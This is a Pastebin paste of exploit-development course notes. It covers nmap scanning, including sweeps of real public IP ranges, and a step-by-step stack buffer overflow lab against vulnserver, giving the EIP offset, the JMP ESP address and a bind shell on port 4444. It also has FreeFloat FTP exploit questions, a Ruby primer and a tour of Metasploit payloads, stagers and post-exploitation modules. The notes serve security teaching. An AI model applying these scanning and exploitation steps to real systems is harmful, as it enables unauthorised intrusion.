Advertisement
joemccray

Exploit Dev 2020

Jun 3rd, 2019
3,069
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 84.42 KB | None | 0 0
  1. ########################
  2. # Scanning Methodology #
  3. ########################
  4.  
  5. - Ping Sweep
  6. What's alive?
  7. ------------
  8.  
  9. ---------------------------Type this command-----------------------------------
  10. sudo nmap -sP 157.166.226.*
  11. -------------------------------------------------------------------------------
  12.  
  13.  
  14.  
  15. -if -SP yields no results try:
  16. ---------------------------Type this command-----------------------------------
  17. sudo nmap -sL 157.166.226.*
  18. -------------------------------------------------------------------------------
  19.  
  20.  
  21.  
  22. -Look for hostnames:
  23. ---------------------------Type this command-----------------------------------
  24. sudo nmap -sL 157.166.226.* | grep cnn
  25. -------------------------------------------------------------------------------
  26.  
  27.  
  28.  
  29. - Port Scan
  30. What's where?
  31. ------------
  32. ---------------------------Type this command-----------------------------------
  33. sudo nmap -sS 162.243.126.247
  34. -------------------------------------------------------------------------------
  35.  
  36.  
  37.  
  38. - Bannergrab/Version Query
  39. What versions of software are running
  40. -------------------------------------
  41.  
  42. ---------------------------Type this command-----------------------------------
  43. sudo nmap -sV 162.243.126.247
  44. -------------------------------------------------------------------------------
  45.  
  46.  
  47.  
  48.  
  49. - Vulnerability Research
  50. Lookup the banner versions for public exploits
  51. ----------------------------------------------
  52. https://www.exploit-db.com/search
  53. http://securityfocus.com/bid
  54. https://packetstormsecurity.com/files/tags/exploit/
  55.  
  56.  
  57.  
  58. Network Penetration Testing Process (known vulnerabilities)
  59. -----------------------------------------------------------
  60.  
  61.  
  62. 1. Ping Sweep:
  63. The purpose of this step is to identify live hosts
  64.  
  65. nmap -sP <ip-address/ip-range>
  66.  
  67.  
  68. 2. Port Scan
  69. Identify running services. We use the running services to map the network topology.
  70.  
  71. nmap -sS <ip-address/ip-range>
  72.  
  73.  
  74. 3. Bannergrab
  75. Identify the version of version of software running on each port
  76.  
  77. nmap -sV <ip-address/ip-range>
  78.  
  79.  
  80.  
  81. 4. Vulnerability Research
  82. Use the software version number to research and determine if it is out of date (vulnerable).
  83.  
  84. exploit-db.com/search
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94. Skill Level 1. Run the scanners
  95. -------------------------------
  96. Nexpose
  97. Qualys
  98. Retina
  99. Nessus known vulnerabilities
  100. OpenVas
  101. Foundscan
  102. GFI LanGuard
  103. NCircle
  104.  
  105.  
  106. Skill Level 2. Manual vulnerability validation (known vulnerabilities)
  107. -----------------------------------------------------------------------
  108.  
  109. windows -> systeminfo
  110. Linux-> dpkg -l
  111. rpm -qa
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119. #####################################
  120. # Quick Stack Based Buffer Overflow #
  121. #####################################
  122.  
  123. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  124. http://45.63.104.73/ExploitLab.zip
  125.  
  126.  
  127. - Extract the ExploitLab.zip file to your Desktop
  128.  
  129. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  130.  
  131. - Open a new command prompt and type:
  132.  
  133. ---------------------------Type This-----------------------------------
  134. nc localhost 9999
  135. --------------------------------------------------------------------------
  136.  
  137. - In the new command prompt window where you ran nc type:
  138. HELP
  139.  
  140. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  141. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  142.  
  143. - Now double-click on 1-simplefuzzer.py
  144. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  145.  
  146.  
  147. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  148.  
  149. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  150.  
  151. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  152.  
  153. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  154.  
  155. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  156.  
  157. - Calculate the distance to EIP by running script 3-3000chars.py
  158. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  159.  
  160. 4-count-chars-to-EIP.py
  161. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  162. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  163.  
  164. 5-2006char-eip-check.py
  165. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  166.  
  167. 6-jmp-esp.py
  168. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  169.  
  170. 7-first-exploit
  171. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  172.  
  173. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  174.  
  175.  
  176. ------------------------------
  177.  
  178.  
  179.  
  180. Skill Level 3. Identify unknown vulnerabilities
  181. -----------------------------------------------
  182.  
  183. - App Type
  184. ------------
  185. Stand Alone Client Server Web App
  186.  
  187. ***(vulnerserver.exe)***
  188.  
  189.  
  190. - Input TYpe
  191. -------------
  192. FIle logical network port Browser
  193. Keyboard
  194. Mouse
  195.  
  196.  
  197.  
  198. ***(9999)***
  199.  
  200.  
  201. - Map & Fuzz app entry points:
  202. ------------------------------
  203. - Commands ***(commands)***
  204. - Methods
  205. - Verbs
  206. - functions
  207. - subroutines
  208. - controllers
  209.  
  210.  
  211. - Isolate the crash
  212. -------------------
  213. App seems to reliably crash at TRUN 2100
  214.  
  215.  
  216. - Calculate the distance to EIP
  217. -------------------------------
  218. Distance to EIP is 2006
  219.  
  220. We found that EIP was populated with the value: 396F4338
  221. 396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
  222.  
  223. An online tool that we can use for this is:
  224. https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
  225.  
  226.  
  227.  
  228. - Redirect Program Execution
  229. ----------------------------
  230. A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
  231. We learned that we control EAX and ESP in script 2.
  232.  
  233.  
  234.  
  235.  
  236.  
  237. - Implement Shellcode
  238. ---------------------
  239. There are only 2 things that can go wrong with shellcode:
  240. - Not enough space
  241. - Bad characters
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248. #########################################
  249. # FreeFloat FTP Server Exploit Analysis #
  250. #########################################
  251.  
  252.  
  253.  
  254. Analyze the following exploit code:
  255. https://www.exploit-db.com/exploits/15689/
  256.  
  257. 1. What is the target platform that this exploit works against?
  258. 2. What is the variable name for the distance to EIP?
  259. 3. What is the actual distance to EIP in bytes?
  260. 4. Describe what is happening in the variable ‘junk2’
  261.  
  262.  
  263.  
  264.  
  265. Analysis of the training walk-through based on EID: 15689:
  266. http://45.63.104.73/ff.zip
  267.  
  268.  
  269.  
  270.  
  271. ff1.py
  272. 1. What does the sys module do?
  273. 2. What is sys.argv[1] and sys.argv[2]?
  274. 3. What application entry point is being attacked in this script?
  275.  
  276.  
  277.  
  278. ff2.py
  279. 1. Explain what is happening in lines 18 - 20 doing.
  280. 2. What is pattern_create.rb doing and where can I find it?
  281. 3. Why can’t I just double click the file to run this script?
  282.  
  283.  
  284.  
  285. ff3.py
  286. 1. Explain what is happening in lines 17 - to 25?
  287. 2. Explain what is happening in lines 30 - to 32?
  288. 3. Why is everything below line 35 commented out?
  289.  
  290.  
  291.  
  292. ff4.py
  293. 1. Explain what is happening in lines 13 to 15.
  294. 2. Explain what is happening in line 19.
  295. 3. What is the total length of buff?
  296.  
  297.  
  298.  
  299. ff5.py
  300. 1. Explain what is happening in line 15.
  301. 2. What is struct.pack?
  302. 3. How big is the shellcode in this script?
  303.  
  304.  
  305.  
  306. ff6.py
  307. 1. What is the distance to EIP?
  308. 2. How big is the shellcode in this script?
  309. 3. What is the total byte length of the data being sent to this app?
  310.  
  311.  
  312.  
  313.  
  314. ff7.py
  315. 1. What is a tuple in python?
  316. 2. How big is the shellcode in this script?
  317. 3. Did your app crash in from this script?
  318.  
  319.  
  320.  
  321.  
  322. ff8.py
  323. 1. How big is the shellcode in this script?
  324. 2. What is try/except in python?
  325. 3. What is socket.SOCK_STREAM in Python?
  326.  
  327.  
  328.  
  329. ff9.py
  330. 1. What is going on in lines 19 and 20?
  331. 2. What is the length of the NOPs?
  332. 3. From what DLL did the address of the JMP ESP come from?
  333.  
  334.  
  335.  
  336.  
  337. ff010.py
  338. 1. What is going on in lines 18 - 20?
  339. 2. What is going on in lines 29 - 32?
  340. 3. How would a stack adjustment help this script?
  341.  
  342.  
  343. Required review videos to watch tonight:
  344. ----------------------------------------
  345. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  346. Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
  347.  
  348. Recommended (not required) videos to watch tonight:
  349. ---------------------------------------------------
  350. For more background on Assembly I would recommend the following video series (videos 1-11):
  351. https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
  352. Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
  353.  
  354.  
  355.  
  356.  
  357. ###################################
  358. # Day 2: Programming Fundamentals #
  359. ###################################
  360. How I did it:
  361.  
  362. Step 1: Watch and do the newboston Python video series twice
  363. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  364.  
  365.  
  366. Step 2: Watch and do the Google Python workshop twice
  367. https://www.youtube.com/playlist?list=PLfZeRfzhgQzTMgwFVezQbnpc1ck0I6CQl
  368.  
  369.  
  370. Step 3: Download all of the Python tools from PacketStorm and analyze the source code
  371. https://packetstormsecurity.com/files/tags/python
  372.  
  373.  
  374. Here is the code from Packet Storm
  375. http://45.63.104.73/PythonReferenceCode.zip
  376.  
  377. I went through almost every single file and looked up the code that I didn't understand.
  378. I also asked programmers to help me understand the lines of code that didn't make sense.
  379. In the folder RAC-Brute I actually had to hire a developer from an outsourcing website to comment,
  380. and explain the tool to me.
  381.  
  382. Here is what I got out of doing that:
  383. https://s3.amazonaws.com/infosecaddictsfiles/sorted-commented-python-files.zip
  384.  
  385.  
  386.  
  387. Distilled that into this:
  388. http://45.63.104.73/Python-Courseware.zip
  389.  
  390.  
  391.  
  392.  
  393.  
  394.  
  395. ########################
  396. # Introduction to Ruby #
  397. ########################
  398. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  399. scientist and programmer from Japan. It is a cross-platform dynamic language.
  400.  
  401. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  402. on Rails is a framework that is written in Ruby.
  403.  
  404. - Ruby's file name extensions are .rb and .rbw.
  405.  
  406. - official website of this
  407.  
  408. - language: www.ruby-lang.org.
  409.  
  410.  
  411. - interactive Shell called Ruby Shell
  412.  
  413. - open up the interactive console and play around.
  414.  
  415. ---------------------------Type This-----------------------------------
  416. irb
  417. -----------------------------------------------------------------------
  418.  
  419.  
  420. - Math, Variables, Classes, Creating Objects and Inheritance
  421.  
  422.  
  423. The following arithmetic operators:
  424. Addition operator (+) — 10 + 23
  425. Subtraction operator (-) — 1001 - 34
  426. Multiplication operator (*) — 5 * 5
  427. Division operator (/) — 12 / 2
  428.  
  429.  
  430.  
  431. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  432. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  433. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  434.  
  435. ---------------------------Type This-----------------------------------
  436. x = 25
  437. x + 30
  438. y = 69
  439. y+33
  440. -----------------------------------------------------------------------
  441.  
  442.  
  443.  
  444. - Let's look at creating classes and creating objects.
  445.  
  446. - Here, the name of the class is Attack. An object has its properties and methods.
  447.  
  448.  
  449. ---------------------------Type This-----------------------------------
  450. class Attack
  451. attr_accessor :of, :sqli, :xss
  452. end
  453. -----------------------------------------------------------------------
  454.  
  455.  
  456. What is nil?
  457. Reference:
  458. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  459.  
  460. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  461.  
  462. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  463.  
  464. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  465.  
  466.  
  467.  
  468.  
  469.  
  470. # Now that we have created the classes let's create the objects
  471. ---------------------------Type This-----------------------------------
  472. first_attack = Attack.new
  473. first_attack.of = "stack"
  474. first_attack.sqli = "blind"
  475. first_attack.xss = "dom"
  476. puts first_attack.of
  477. puts first_attack.sqli
  478. puts first_attack.xss
  479. -----------------------------------------------------------------------
  480.  
  481.  
  482.  
  483.  
  484. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  485. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  486. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  487. programming life easier by maximizing code reuse.
  488.  
  489.  
  490. ---------------------------Type This-----------------------------------
  491. class Exploitframeworks
  492. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  493. end
  494. class Metasploit < Exploitframeworks
  495. end
  496. class Canvas < Exploitframeworks
  497. end
  498. class Coreimpact < Exploitframeworks
  499. end
  500. class Saint < Exploitframeworks
  501. end
  502. class Exploitpack < Exploitframeworks
  503. end
  504. -----------------------------------------------------------------------
  505.  
  506.  
  507.  
  508.  
  509. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  510.  
  511. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  512.  
  513. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  514. it will print this string: "We are Learning how to PenTest"
  515.  
  516. - An object named 'bo' is created, which is used to call the method.
  517.  
  518.  
  519. ---------------------------Type This-----------------------------------
  520. class Msfnl
  521. def learning
  522. puts "We are Learning how to PenTest"
  523. end
  524. end
  525. -----------------------------------------------------------------------
  526.  
  527. #Now let's define an object for our Method
  528.  
  529. ---------------------------Type This-----------------------------------
  530. joe = Msfnl.new
  531. joe.learning
  532. -----------------------------------------------------------------------
  533.  
  534.  
  535.  
  536. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  537. calling the puts() function, we are sending a string value to the function. This string value is used by the
  538. function to perform some particular operations.
  539.  
  540. puts ("Pentesting")
  541.  
  542.  
  543. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  544. explain some useful string functions with an example.
  545.  
  546. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  547. reverse function reverses a string. The following example demonstrates how to use the string functions.
  548.  
  549. ---------------------------Type This-----------------------------------
  550. 55.class
  551. "I Love Programming".class
  552. "I Love Pentesting".length
  553. "Pown that box".upcase
  554. "Love" + "To Root Boxes"
  555. "evil".reverse
  556. "evil".reverse.upcase
  557. -----------------------------------------------------------------------
  558.  
  559.  
  560. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  561. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  562. examples of some expressions.
  563.  
  564. ---------------------------Type This-----------------------------------
  565. a = 3
  566. b = 6
  567. a+b+20
  568. d = 44
  569. f = d
  570. puts f
  571. -----------------------------------------------------------------------
  572.  
  573.  
  574.  
  575.  
  576.  
  577. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  578. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  579. statements to understand the shortcuts.
  580.  
  581. ---------------------------Type This-----------------------------------
  582. g = 70
  583. g = g+44
  584. g += 33
  585. -----------------------------------------------------------------------
  586.  
  587.  
  588. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  589.  
  590.  
  591.  
  592. ---------------------------Type This-----------------------------------
  593. g *= 3
  594. -----------------------------------------------------------------------
  595.  
  596.  
  597. - In the above statement, g is multiplied with 3 and then assigned to g.
  598.  
  599. - Example
  600.  
  601. - Comparison Operators, Loops, Data Types, and Constants
  602.  
  603. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  604. how to use the following comparison operators.
  605.  
  606. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  607. variable or constant. If it's less than the other, the 'less than' operator returns true.
  608.  
  609. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  610. or constant. If it's equal to the other, the 'equal to' operator returns true.
  611.  
  612. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  613. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  614.  
  615. ---------------------------Type This-----------------------------------
  616. numberofports = 55
  617. puts "number of ports found during scan" if numberofports < 300
  618. numberofports = 400
  619. puts "number of ports found during scan" if numberofports < 300
  620. puts "number of ports found during scan" if numberofports == 300
  621. puts "number of ports found during scan" if numberofports != 300
  622. -----------------------------------------------------------------------
  623.  
  624.  
  625.  
  626. Example
  627.  
  628.  
  629. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  630.  
  631. - This operator is generally used to combine multiple conditions.
  632. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  633.  
  634. - following example to understand how this operator works.
  635.  
  636. ---------------------------Type This-----------------------------------
  637. ports = 100
  638. puts "number of ports found on the network" if ports<100 || ports>200
  639. puts "number of ports found on the network" if ports<100 || ports>75
  640. -----------------------------------------------------------------------
  641.  
  642. # unless
  643.  
  644. ---------------------------Type This-----------------------------------
  645. portsbelow1024 = 50
  646. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  647. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  648. puts "If the ports are below 1024" unless portsbelow1024 < 20
  649. -----------------------------------------------------------------------
  650.  
  651. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  652.  
  653.  
  654.  
  655. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  656.  
  657. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  658.  
  659. ---------------------------Type This-----------------------------------
  660. 10.times do puts "infosecaddicts" end
  661. -----------------------------------------------------------------------
  662.  
  663. # Or use the curly braces
  664.  
  665. ---------------------------Type This-----------------------------------
  666. 10.times {puts "infosecaddicts"}
  667. -----------------------------------------------------------------------
  668.  
  669.  
  670. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  671. working with different data types. Data type conversion is also known as type casting.
  672.  
  673.  
  674.  
  675. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  676. change the value of a constant, you will see a warning message.
  677.  
  678.  
  679.  
  680.  
  681. - Multiple Line String Variable, Interpolation, and Regular Expressions
  682.  
  683. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  684.  
  685. ---------------------------Type This-----------------------------------
  686. infosecaddicts = <<mark
  687. welcome
  688. to the
  689. best
  690. metasploit
  691. course
  692. on the
  693. market
  694. mark
  695. puts infosecaddicts
  696. -----------------------------------------------------------------------
  697.  
  698.  
  699. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  700. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  701. Examine the following example to understand how interpolation works in Ruby.
  702.  
  703. References:
  704. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  705.  
  706.  
  707. ---------------------------Type This-----------------------------------
  708. a = 4
  709. b = 6
  710. puts "a * b = a*b"
  711. puts " #{a} * #{b} = #{a*b} "
  712. person = "Joe McCray"
  713. puts "IT Security consultant person"
  714. puts "IT Security consultant #{person}"
  715. -----------------------------------------------------------------------
  716.  
  717. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  718.  
  719.  
  720.  
  721.  
  722.  
  723. - Character classes
  724. ---------------------------Type This-----------------------------------
  725. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  726. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  727. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  728. -----------------------------------------------------------------------
  729.  
  730.  
  731. - Arrays, Push and Pop, and Hashes
  732.  
  733.  
  734. - In the following example, numbers is an array that holds 6 integer numbers.
  735.  
  736.  
  737. ---------------------------Type This-----------------------------------
  738. numbers = [2,4,6,8,10,100]
  739. puts numbers[0]
  740. puts numbers[4]
  741. numbers[2] = 150
  742. puts numbers
  743. -----------------------------------------------------------------------
  744.  
  745.  
  746.  
  747. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  748.  
  749.  
  750. ---------------------------Type This-----------------------------------
  751. framework = []
  752. framework << "modules"
  753. framework << "exploits"
  754. framework << "payloads"
  755. framework.pop
  756. framework.shift
  757. -----------------------------------------------------------------------
  758.  
  759. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  760. that is used to access the element.
  761.  
  762.  
  763. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  764. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  765. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  766.  
  767. ---------------------------Type This-----------------------------------
  768. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  769. print metasploit.size
  770. print metasploit["microsoft"]
  771. metasploit['microsoft'] = 'redhat'
  772. print metasploit['microsoft']
  773. -----------------------------------------------------------------------
  774.  
  775.  
  776.  
  777. - Writing Ruby Scripts
  778.  
  779.  
  780. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  781. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  782. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  783. ---------------------------Type This-----------------------------------
  784. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
  785. ls
  786. -----------------------------------------------------------------------
  787.  
  788.  
  789.  
  790. ###########################
  791. # Metasploit Fundamentals #
  792. ###########################
  793.  
  794.  
  795. Log into this server:
  796.  
  797.  
  798. Host: 45.77.13.200
  799. protocol: ssh
  800. port: 22
  801. user: linuxclass
  802. pass:
  803.  
  804.  
  805.  
  806.  
  807. - Let's take a little look at Metasploit Framework
  808.  
  809. - First, we should take note of the different directories, the Modular Architecture.
  810.  
  811. The modules that make up the Modular Architecture are
  812. Exploits
  813. Auxiliary
  814. Payload
  815. Encoder
  816. Nops
  817.  
  818.  
  819. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  820.  
  821. are
  822.  
  823. Modules
  824. Scripts
  825. Plugins
  826. External
  827. Data
  828. Tools
  829.  
  830. - Let's take a look inside the Metasploit directory and see what's the
  831. ---------------------------Type This-----------------------------------
  832. cd /usr/share/metasploit-framework/
  833. ls
  834. -----------------------------------------------------------------------
  835.  
  836.  
  837.  
  838. - Now let's take a look inside the Modules directory and see what's there.
  839. ---------------------------Type This-----------------------------------
  840. cd /usr/share/metasploit-framework/modules
  841. ls
  842. -----------------------------------------------------------------------
  843.  
  844.  
  845. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  846. not necessarily need to - have a shell or session started on a machine.
  847.  
  848. The exploits directory has our modules that we need to pop a shell on a box.
  849. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  850. like Burp Suite
  851. - Let's take a look at the external directory
  852. ---------------------------Type This-----------------------------------
  853. cd /usr/share/metasploit-framework/external
  854. ls
  855. -----------------------------------------------------------------------
  856.  
  857. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  858. ---------------------------Type This-----------------------------------
  859. cd /usr/share/metasploit-framework/data
  860. ls
  861. -----------------------------------------------------------------------
  862.  
  863. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  864. brute-forcing
  865. ---------------------------Type This-----------------------------------
  866. cd /usr/share/metasploit-framework/data/wordlists
  867. ls
  868. -----------------------------------------------------------------------
  869.  
  870. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  871. once a session is created.
  872. ---------------------------Type This-----------------------------------
  873. cd /usr/share/metasploit-framework/data/meterpreter
  874. ls
  875. -----------------------------------------------------------------------
  876.  
  877. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  878. like escalating privileges and dumping hashes.
  879.  
  880. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  881. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  882. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  883. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  884. custom shellcode.
  885.  
  886. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  887. to do with other programs to make things like importing and exporting reports simple.
  888. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  889. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  890. modules we're going to have a better understanding of where everything needs to go.
  891. ---------------------------Type This-----------------------------------
  892. cd /usr/share/metasploit-framework/modules/exploits
  893. ls
  894. -----------------------------------------------------------------------
  895.  
  896.  
  897. - The exploits directory is split up into several different directories, each one housing exploits for different types
  898. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  899. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  900. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  901. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  902. for us.
  903. ---------------------------Type This-----------------------------------
  904. cd /usr/share/metasploit-framework/modules/auxiliary/
  905. ls
  906. -----------------------------------------------------------------------
  907.  
  908.  
  909. - And a little further into the directory, let's take a look at what's in the scanner directory
  910. ---------------------------Type This-----------------------------------
  911. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/
  912. ls
  913. -----------------------------------------------------------------------
  914.  
  915.  
  916. - And one more folder deeper into the structure, let's take a look in the portscan folder
  917. ---------------------------Type This-----------------------------------
  918. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
  919. ls
  920. -----------------------------------------------------------------------
  921.  
  922. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  923. and report them back to us in a nice, easily readable format.
  924.  
  925. cat tcp.rb
  926.  
  927.  
  928.  
  929. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  930. once you have a session on a machine.
  931. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  932. succeeds.
  933. ---------------------------Type This-----------------------------------
  934. cd /usr/share/metasploit-framework/modules/payloads/
  935. ls
  936. -----------------------------------------------------------------------
  937.  
  938.  
  939. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  940. application for it to be used as.
  941. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  942. do everything once you have that shell calling back to you.
  943. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  944. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  945. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  946. to download Stages payloads.
  947.  
  948.  
  949. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  950. shells.
  951. ---------------------------Type This-----------------------------------
  952. cd singles
  953. cd windows
  954. ls
  955. -----------------------------------------------------------------------
  956.  
  957.  
  958. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  959. see what it actually does.
  960. ---------------------------Type This-----------------------------------
  961. cat adduser.rb
  962. -----------------------------------------------------------------------
  963.  
  964. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  965. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  966. it gives Windows to add the user to the system.
  967.  
  968.  
  969. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  970.  
  971. windows/shell/bind_tcp or windows/shell/reverse_tcp
  972. ---------------------------Type This-----------------------------------
  973. cd ../../stagers
  974. ls
  975. -----------------------------------------------------------------------
  976.  
  977.  
  978.  
  979. - Again, we can see that we have stagers for multiple systems and code types.
  980. ---------------------------Type This-----------------------------------
  981. ls windows/
  982. -----------------------------------------------------------------------
  983.  
  984.  
  985. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  986. machine, so we can upload or download our stage payloads and execute commands.
  987. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  988. our stagers...
  989. ---------------------------Type This-----------------------------------
  990. cd ../stages
  991. ls
  992. -----------------------------------------------------------------------
  993.  
  994.  
  995. Again, we can see that our stages are coded for particular operating systems and languages.
  996. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  997. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  998. if any.
  999.  
  1000. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  1001. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  1002. so we can impersonate other users on the system in hopes of elevating our privileges.
  1003. ---------------------------Type This-----------------------------------
  1004. cd ../../../post/
  1005. ls
  1006. cd windows/
  1007. ls
  1008. -----------------------------------------------------------------------
  1009.  
  1010.  
  1011. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  1012. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  1013. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  1014. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
